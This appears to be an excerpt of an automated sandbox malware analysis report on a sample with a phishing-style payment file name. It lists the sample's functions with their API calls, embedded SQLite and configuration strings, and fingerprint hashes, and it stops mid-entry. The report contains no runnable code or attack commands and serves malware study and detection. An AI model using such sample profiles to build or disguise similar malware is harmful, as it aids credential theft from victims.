                                                                                                                                                                                                                                          • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                                                                                                                                                                                                          • API String ID: 1297977491-2001300268
                                                                                                                                                                                                                                          • Opcode ID: 555983bd08e1e0f26dd17bbb53403158099364c4b4daee471fd2bbf0d1f998cc
                                                                                                                                                                                                                                          • Instruction ID: 2d624c67d108d3170f37657fe85980b6deaf3b4166a4b31ce602698a835437d0
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 555983bd08e1e0f26dd17bbb53403158099364c4b4daee471fd2bbf0d1f998cc
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4791C131B00315AFDB10DF65E481B9ABBB0AF44318F94807FE8059B252D778E949CB59
                                                                                                                                                                                                                                          Function 0040EAFF Relevance: 13.7, APIs: 7, Strings: 2, Instructions: 160COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8EC
                                                                                                                                                                                                                                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8FA
                                                                                                                                                                                                                                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E90B
                                                                                                                                                                                                                                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E922
                                                                                                                                                                                                                                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E92B
                                                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000000,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040EB3F
                                                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040EB5B
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,0045A248,00000014,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?), ref: 0040EB80
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,0045A234,00000014,?,0045A248,00000014,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?), ref: 0040EB94
                                                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000000,?,004126A8,00000000), ref: 0040EC17
                                                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(0000000C,00000000,?,004126A8,00000000), ref: 0040EC21
                                                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000000,?,004126A8,00000000), ref: 0040EC59
                                                                                                                                                                                                                                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                                                                                                                                                                                                                            • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                                                                                                                                                                                                                            • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                                                                                                                                                                                                                            • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                                                                                                            • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                                                                                                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ??2@??3@$memcpy$HandleModule$LoadStringwcscpywcslen
                                                                                                                                                                                                                                          • String ID: ($d
                                                                                                                                                                                                                                          • API String ID: 1140211610-1915259565
                                                                                                                                                                                                                                          • Opcode ID: a1c7ed4194c507a0631b10337623f35aa4fe9b12b4df3912366feb9681346245
                                                                                                                                                                                                                                          • Instruction ID: 92dd2811bdb74a70ba85f750b5b6098557f3982e7a927aadba8bcdb4291d1afd
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a1c7ed4194c507a0631b10337623f35aa4fe9b12b4df3912366feb9681346245
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D7518D71601704AFD724DF2AC586A5AB7F8FF48314F10892EE55ACB381DB75E9408B48
                                                                                                                                                                                                                                          Function 00417887 Relevance: 13.6, APIs: 9, Instructions: 126filesleepCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004178DF
                                                                                                                                                                                                                                          • Sleep.KERNEL32(00000001), ref: 004178E9
                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 004178FB
                                                                                                                                                                                                                                          • UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004179D3
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: File$ErrorLastLockSleepUnlock
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3015003838-0
                                                                                                                                                                                                                                          • Opcode ID: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                                                                                                                                                                                                          • Instruction ID: bb7e89fefddb53edf96b8819cb9ac805ac4f8ca395f1f2490f4f27a155f14dd5
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C741FFB515C3029FE3209F219C05BA7B7F1BFC4714F20092EF5A556280CBB9D8898A6E
                                                                                                                                                                                                                                          Function 00407E1E Relevance: 13.6, APIs: 9, Instructions: 115COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00407E44
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00407E5B
                                                                                                                                                                                                                                          • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407E7E
                                                                                                                                                                                                                                          • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407ED7
                                                                                                                                                                                                                                          • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407EEE
                                                                                                                                                                                                                                          • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407F01
                                                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 00407F10
                                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _mbscpy$ByteCharMultiWidememset$wcscpy
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 59245283-0
                                                                                                                                                                                                                                          • Opcode ID: 5e520accdd45059f4d080cd8d67ab72c1dc8c36b7959bb75ad43466fad0b9107
                                                                                                                                                                                                                                          • Instruction ID: 836b70714d1948736637452a130addde846eabb024256fa404d9b75b59221f05
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5e520accdd45059f4d080cd8d67ab72c1dc8c36b7959bb75ad43466fad0b9107
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2F4130B5900218AFDB20EB65CC81FDAB7FCBB09354F0085AAF559E7241DB34AB488F55
                                                                                                                                                                                                                                          Function 0041851E Relevance: 13.6, APIs: 9, Instructions: 67sleepfileCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • DeleteFileW.KERNEL32(00000000,00000000,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 00418548
                                                                                                                                                                                                                                          • GetFileAttributesW.KERNEL32(00000000), ref: 0041854F
                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0041855C
                                                                                                                                                                                                                                          • Sleep.KERNEL32(00000064), ref: 00418571
                                                                                                                                                                                                                                          • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 0041857A
                                                                                                                                                                                                                                          • GetFileAttributesA.KERNEL32(00000000), ref: 00418581
                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0041858E
                                                                                                                                                                                                                                          • Sleep.KERNEL32(00000064), ref: 004185A3
                                                                                                                                                                                                                                          • free.MSVCRT ref: 004185AC
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: File$AttributesDeleteErrorLastSleep$free
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2802642348-0
                                                                                                                                                                                                                                          • Opcode ID: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                                                                                                                                                                                                                          • Instruction ID: d61f765991b085217c17e58d7c3851c8d0f597f546fc635256e60a728691d00d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A011C639540624BBC61027716CC89BE3676E75B335B210A2EFA22912D0DF6C4CC2557E
                                                                                                                                                                                                                                          Function 00414E7F Relevance: 13.6, APIs: 3, Strings: 6, Instructions: 63COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • memcpy.MSVCRT(004032AB,&quot;,0000000C,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EB6
                                                                                                                                                                                                                                          • memcpy.MSVCRT(004032AB,&amp;,0000000A,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EE2
                                                                                                                                                                                                                                          • memcpy.MSVCRT(004032AD,&lt;,00000008,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EFC
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memcpy
                                                                                                                                                                                                                                          • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                                                                                                                                                                          • API String ID: 3510742995-3273207271
                                                                                                                                                                                                                                          • Opcode ID: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                                                                                                                                                                                                                          • Instruction ID: c5e12263314fdcdd46b54c12ab2af12db27c873e0c2922b0206687d3a4296adb
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A601F576F8032071EA3020058C46FF70558FBF2B1AFA20127FD86292D5D28D0AC7929F
                                                                                                                                                                                                                                          Function 00413A3F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00000000,?,004133E1,00000000,00000000), ref: 00413A7A
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00413ADC
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00413AEC
                                                                                                                                                                                                                                            • Part of subcall function 00413959: wcscpy.MSVCRT ref: 00413982
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00413BD7
                                                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 00413BF8
                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,3A,?,?,?,004133E1,00000000,00000000), ref: 00413C4E
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memset$wcscpy$CloseHandleOpenProcess
                                                                                                                                                                                                                                          • String ID: 3A
                                                                                                                                                                                                                                          • API String ID: 3300951397-293699754
                                                                                                                                                                                                                                          • Opcode ID: 60cd21eba0755187b3415576207be6f8e5fc256c319da37b94ce2418303dd88c
                                                                                                                                                                                                                                          • Instruction ID: 1dd795ac5698d536b98d54c3d0ab6bca04534a71b571f2ddc62e59a9adc8dd8d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 60cd21eba0755187b3415576207be6f8e5fc256c319da37b94ce2418303dd88c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3C514D71108341AFD720DF25DC84ADBB7E8FF84705F004A2EF59992291EB75DA44CBAA
                                                                                                                                                                                                                                          Function 0040D134 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 104COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                                                                                                            • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
                                                                                                                                                                                                                                            • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                                                                                                                                                                                                                                          • wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                                                                                                                                                                                                                          • LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                                                                                                                                                                                                                          • memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                                                                                                                                                                                                                            • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D0CC
                                                                                                                                                                                                                                            • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D0EA
                                                                                                                                                                                                                                            • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D108
                                                                                                                                                                                                                                            • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D126
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                                                                                                                                                                                                          • String ID: strings
                                                                                                                                                                                                                                          • API String ID: 3166385802-3030018805
                                                                                                                                                                                                                                          • Opcode ID: 07dd20e83a72376c017d688d2d43246e42d1d17d60f688a4af98472ad4cd9316
                                                                                                                                                                                                                                          • Instruction ID: f4589d763452722e7ce024d248fd6f149fceb83749f413ad0df853fa0cd60d20
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 07dd20e83a72376c017d688d2d43246e42d1d17d60f688a4af98472ad4cd9316
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 78418D75D003109BD7369FA8ED809263365FF48306700047EE942972A7DEB9E886CB5D
                                                                                                                                                                                                                                          Function 00411AC5 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 59COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00411AF6
                                                                                                                                                                                                                                            • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
                                                                                                                                                                                                                                          • wcsrchr.MSVCRT ref: 00411B14
                                                                                                                                                                                                                                          • wcscat.MSVCRT ref: 00411B2E
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: FileModuleNamememsetwcscatwcsrchr
                                                                                                                                                                                                                                          • String ID: AE$.cfg$General$EA
                                                                                                                                                                                                                                          • API String ID: 776488737-1622828088
                                                                                                                                                                                                                                          • Opcode ID: 83214be69100a2e0159230acb683643c3f3e541604283d72b2cc5b33c3359a8e
                                                                                                                                                                                                                                          • Instruction ID: 09e7cc653f6f297407560738dd106e03d424c3973b250f6ebd227ee33dbedd02
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 83214be69100a2e0159230acb683643c3f3e541604283d72b2cc5b33c3359a8e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9611B93250022C66DF20EF51DC85ACE7378FF54754F1004ABE908B7142DB74ABC88B99
                                                                                                                                                                                                                                          Function 0040D898 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 58COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040D8BD
                                                                                                                                                                                                                                          • GetDlgCtrlID.USER32(?), ref: 0040D8C8
                                                                                                                                                                                                                                          • GetWindowTextW.USER32(?,?,00001000), ref: 0040D8DF
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040D906
                                                                                                                                                                                                                                          • GetClassNameW.USER32(?,?,000000FF), ref: 0040D91D
                                                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 0040D92F
                                                                                                                                                                                                                                            • Part of subcall function 0040D76E: memset.MSVCRT ref: 0040D781
                                                                                                                                                                                                                                            • Part of subcall function 0040D76E: _itow.MSVCRT ref: 0040D78F
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                                                                                                                                                                                                                          • String ID: sysdatetimepick32
                                                                                                                                                                                                                                          • API String ID: 1028950076-4169760276
                                                                                                                                                                                                                                          • Opcode ID: dc1af48194af82a98770d28407c75daa8b541611d8ddf07168db58443698622d
                                                                                                                                                                                                                                          • Instruction ID: 7fefccf0184427ff86f81c2eca1e08be5bb75bf3b76f29e65549559b88306b24
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dc1af48194af82a98770d28407c75daa8b541611d8ddf07168db58443698622d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 061177769002197AEB10EB91DC49EDF7BACEF05750F0040BAF508D2192EB749A85CA59
                                                                                                                                                                                                                                          Function 0041B7D9 Relevance: 12.3, APIs: 6, Strings: 2, Instructions: 269COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • memcpy.MSVCRT(00000000,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B911
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B923
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,-journal,00000008,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B93B
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B958
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,-wal,00000004,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0041B970
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0041BA3D
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memcpy$memset
                                                                                                                                                                                                                                          • String ID: -journal$-wal
                                                                                                                                                                                                                                          • API String ID: 438689982-2894717839
                                                                                                                                                                                                                                          • Opcode ID: d962323e81d37dfb90646eb98bd258cd4124eefff3809fb07e01f1771a5947a6
                                                                                                                                                                                                                                          • Instruction ID: 9370885b9bf0560d7aa4477d28ce4586d78acc2621466e64c0ac2b95c9c5353a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d962323e81d37dfb90646eb98bd258cd4124eefff3809fb07e01f1771a5947a6
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CBA1EFB1A04606EFCB14DF69C8417DAFBB4FF04314F14826EE46897381D738AA95CB99
                                                                                                                                                                                                                                          Function 00405B83 Relevance: 12.2, APIs: 8, Instructions: 197windowCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 00405C27
                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 00405C3A
                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 00405C4F
                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 00405C67
                                                                                                                                                                                                                                          • EndDialog.USER32(?,00000002), ref: 00405C83
                                                                                                                                                                                                                                          • EndDialog.USER32(?,00000001), ref: 00405C98
                                                                                                                                                                                                                                            • Part of subcall function 00405942: GetDlgItem.USER32(?,000003E9), ref: 0040594F
                                                                                                                                                                                                                                            • Part of subcall function 00405942: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00405964
                                                                                                                                                                                                                                          • SendDlgItemMessageW.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405CB0
                                                                                                                                                                                                                                          • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405DC1
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Item$Dialog$MessageSend
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3975816621-0
                                                                                                                                                                                                                                          • Opcode ID: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
